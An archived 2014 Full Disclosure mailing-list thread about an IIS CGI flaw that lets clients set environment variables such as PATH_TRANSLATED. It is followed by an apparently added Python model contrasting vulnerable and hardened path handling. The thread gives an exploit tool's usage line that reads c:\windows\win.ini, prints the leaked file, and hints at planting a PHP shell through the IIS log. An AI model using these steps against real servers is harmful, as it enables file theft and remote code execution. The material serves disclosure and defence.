Message-ID: <CALf7PjH9-aYGFe6tWwBqD=BU+XBQHnOczbj=_y7LMB1GVnvgBw@mail.gmail.com>
Date: Thu, 10 Apr 2014 15:19:52 +0800
From: YiFei Yang <le.concorde.4590@...il.com>
To: "fulldisclosure@...lists.org" <fulldisclosure@...lists.org>
Subject: Re: [FD] iis cgi 0day
So, for those of you who don't read Chinese, here is the brief idea of the
original post.
It is a bug affecting IIS4/5 using CGI on Windows NT/2000. Microsoft is
aware of it and won't fix it.
The discovery of the bug was back in year 2011.
By exploiting this bug, the attacker can set arbitrary environment
variables for the CGI process on the target machine, which can be further
exploited to get sensitive information, or cause remote code execution.
2014-04-10 10:25 GMT+08:00 yuange <yuange1975@...mail.com>:
> Discovered in 2000 for IIS4\IIS5 0day.
>
> .php -> php.exe
>
> The exploit file, ver 4.1.1.
>
> http://seclists.org/fulldisclosure/2012/Apr/13
>
> usage:
> iisexp411 127.0.0.1 /AprilFools'Day.php PATH_TRANSLATED c:\windows\win.ini
>
> yuan can get the file c:\windows\win.ini
>
> HTTP/1.1 200 OK
> Server: Microsoft-IIS/5.0
> Date: Thu, 10 Apr 2014 02:11:37 GMT
> Connection: close
> X-Powered-By: PHP/4.0.0
> Content-type: text/html
>
> ; for 16-bit app support
> [fonts]
> [extensions]
> [mci extensions]
> [files]
> [Mail]
> MAPI=1
> [MCI Extensions.BAK]
> asf=MPEGVideo
> asx=MPEGVideo
> ivf=MPEGVideo
> m3u=MPEGVideo
> mp2v=MPEGVideo
> mp3=MPEGVideo
> mpv2=MPEGVideo
> wax=MPEGVideo
> wm=MPEGVideo
> wma=MPEGVideo
> wmv=MPEGVideo
> wvx=MPEGVideo
> [SciCalc]
> layout=0
>
> You can use the IIS log file to write phpshell, execute the PHP call system
> cmd.
>
> > Date: Wed, 9 Apr 2014 23:11:28 +0300
> > From: kirils.solovjovs@...ils.com
> > To: yuange1975@...mail.com
> > Subject: Re: [FD] iis cgi 0day
> >
> > Sorry, I don't read Chinese.
> > How is this a 0day?
> >
> > --
> > Kirils Solovjovs
_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
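The mechanism YiFei summarises above, modelled as an added example (not code from the thread, from IIS or from PHP): a CGI dispatcher that lets request-supplied variables override the server's own PATH_TRANSLATED, beside one that derives the script path server-side and confines it to the document root. DOC_ROOT and both request dictionaries are constructed for the example.

```python
"""Model of the CGI trust boundary discussed in the thread.

Under CGI/1.1 the web server builds the environment of the CGI process, and
PHP's CGI binary uses PATH_TRANSLATED to locate the script it runs. If a client
can set that variable itself, php.exe reads and serves whatever file it names.
This is an added model, not the original exploit or IIS code; DOC_ROOT and the
request dictionaries below are constructed sample data.
"""
import ntpath

DOC_ROOT = r"c:\inetpub\wwwroot"   # constructed sample document root
CGI_HANDLER_EXT = ".php"           # the .php -> php.exe mapping from the thread


def naive_script_path(server_env: dict, client_env: dict) -> str:
    """Vulnerable pattern: request-supplied variables override the server's,
    so a client-chosen PATH_TRANSLATED selects any file on the machine."""
    env = {**server_env, **client_env}
    return env["PATH_TRANSLATED"]


def hardened_script_path(server_env: dict, client_env: dict):
    """Mitigation: ignore CGI meta-variables from the request entirely; build
    the path from the server-side SCRIPT_NAME and confine it to DOC_ROOT.
    Returns the resolved path, or None when the request must be refused."""
    script_name = server_env.get("SCRIPT_NAME", "")
    if not script_name.lower().endswith(CGI_HANDLER_EXT):
        return None                                    # not a CGI-mapped script
    root = ntpath.normpath(DOC_ROOT)
    candidate = ntpath.normpath(ntpath.join(root, script_name.lstrip("/")))
    # normpath collapses '..'; commonpath then proves the result stays under root
    if ntpath.commonpath([root, candidate]).lower() != root.lower():
        return None                                    # escaped the document root
    return candidate


# Constructed request: the server derived SCRIPT_NAME from the URL, while the
# client smuggled its own PATH_TRANSLATED, as in the thread's usage line.
SERVER_ENV = {"SCRIPT_NAME": "/AprilFools'Day.php",
              "PATH_TRANSLATED": r"c:\inetpub\wwwroot\AprilFools'Day.php"}
CLIENT_ENV = {"PATH_TRANSLATED": r"c:\windows\win.ini"}

if __name__ == "__main__":
    print("naive   :", naive_script_path(SERVER_ENV, CLIENT_ENV))
    print("hardened:", hardened_script_path(SERVER_ENV, CLIENT_ENV))
```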